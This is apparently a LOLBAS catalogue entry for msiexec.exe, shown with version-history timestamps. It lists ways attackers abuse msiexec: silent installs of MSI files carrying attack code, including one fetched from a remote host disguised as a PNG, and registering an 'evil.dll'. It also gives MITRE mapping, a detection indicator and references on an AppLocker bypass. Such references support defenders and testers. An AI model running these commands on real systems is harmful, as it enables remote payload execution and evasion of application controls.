2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: Msiexec.exe
|
2018-09-24 21:59:43 +02:00
|
|
|
Description: Used by Windows to execute msi files
|
|
|
|
Author: 'Oddvar Moe'
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2018-05-25
|
2018-06-09 00:15:06 +02:00
|
|
|
Commands:
|
|
|
|
- Command: msiexec /quiet /i cmd.msi
|
|
|
|
Description: Installs the target .MSI file silently.
|
2018-09-24 21:59:43 +02:00
|
|
|
Usecase: Execute custom made msi file with attack code
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1218.007
|
2018-09-24 21:59:43 +02:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
|
|
|
Description: Installs the target remote & renamed .MSI file silently.
|
2018-09-24 21:59:43 +02:00
|
|
|
Usecase: Execute custom made msi file with attack code from remote server
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1218.007
|
2018-09-24 21:59:43 +02:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: msiexec /y "C:\folder\evil.dll"
|
|
|
|
Description: Calls DLLRegisterServer to register the target DLL.
|
2018-09-24 21:59:43 +02:00
|
|
|
Usecase: Execute dll files
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1218.007
|
2018-09-24 21:59:43 +02:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: msiexec /z "C:\folder\evil.dll"
|
|
|
|
Description: Calls DLLRegisterServer to un-register the target DLL.
|
2018-09-24 21:59:43 +02:00
|
|
|
Usecase: Execute dll files
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
2021-11-05 19:58:26 +01:00
|
|
|
MitreID: T1218.007
|
2021-01-10 16:04:52 +01:00
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Path: C:\Windows\System32\msiexec.exe
|
|
|
|
- Path: C:\Windows\SysWOW64\msiexec.exe
|
2021-01-10 16:04:52 +01:00
|
|
|
Code_Sample:
|
2018-09-24 23:18:00 +02:00
|
|
|
- Code:
|
2018-09-24 21:59:43 +02:00
|
|
|
Detection:
|
2018-09-24 23:18:00 +02:00
|
|
|
- IOC: msiexec.exe getting files from Internet
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
|
|
|
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: netbiosX
|
|
|
|
Handle: '@netbiosX'
|
|
|
|
- Person: Philip Tsukerman
|
2018-09-24 23:18:00 +02:00
|
|
|
Handle: '@PhilipTsukerman'
|
2021-01-10 16:04:52 +01:00
|
|
|
---
|